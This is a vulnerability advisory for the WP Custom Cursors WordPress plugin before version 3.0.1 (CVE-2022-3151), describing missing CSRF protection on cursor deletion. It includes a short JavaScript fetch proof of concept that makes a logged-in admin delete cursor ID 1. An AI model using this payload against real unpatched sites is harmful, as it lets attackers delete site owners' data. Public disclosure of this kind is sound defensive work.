WordPress Plugin Vulnerabilities

WP Custom Cursors < 3.0.1 - Arbitrary Cursor Deletion via CSRF

Description

The plugin does not have CSRF check in place when deleting cursors, which could allow attackers to made a logged in admin delete arbitrary cursors via a CSRF attack.

Proof of Concept

Make a logged in admin open a page with the following JS code:

fetch('https://example.com/wp-admin/admin.php?page=wp_custom_cursors', { 
method: 'POST', 
headers: new Headers({ 
'Content-Type': 'application/x-www-form-urlencoded', 
}), 
body: 'submit&delete_row=1' 
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

This will make them delete the cursor with ID 1

Affects Plugins

Plugin icon
wp-custom-cursors
Fixed in 3.0.1

References

CVE
CVE-2022-3151

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
4.3 (medium)

Miscellaneous

Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
https://lana.codes/
Submitter twitter
LanaCodes
Verified
Yes
WPVDB ID
27816c70-58ad-4ffb-adcc-69eb1b210744

Timeline

Publicly Published
2022-09-21 (about 1 years ago)
Added
2022-09-21 (about 1 years ago)
Last Updated
2022-10-04 (about 1 years ago)

Other

Published
Title
Published
2014-08-01
Title
Calendar <= 1.3.2 - Entry Addition Cross-Site Request Forgery (CSRF)
Published
2021-10-06
Title
Redirect 404 Error Page to Homepage or Custom Page with Logs < 1.7.9 - Log Deletion via CSRF
Published
2022-08-04
Title
Ecwid Ecommerce Shopping Cart < 6.10.24 - Settings Update via CSRF
Published
2021-07-05
Title
Abandoned Cart Recovery for WooCommerce < 1.0.4.1 - Cross-Site Request Forgery
Published
2024-01-09
Title
Auto Affiliate Links < 6.4.2.8 - Cross-Site Request Forgery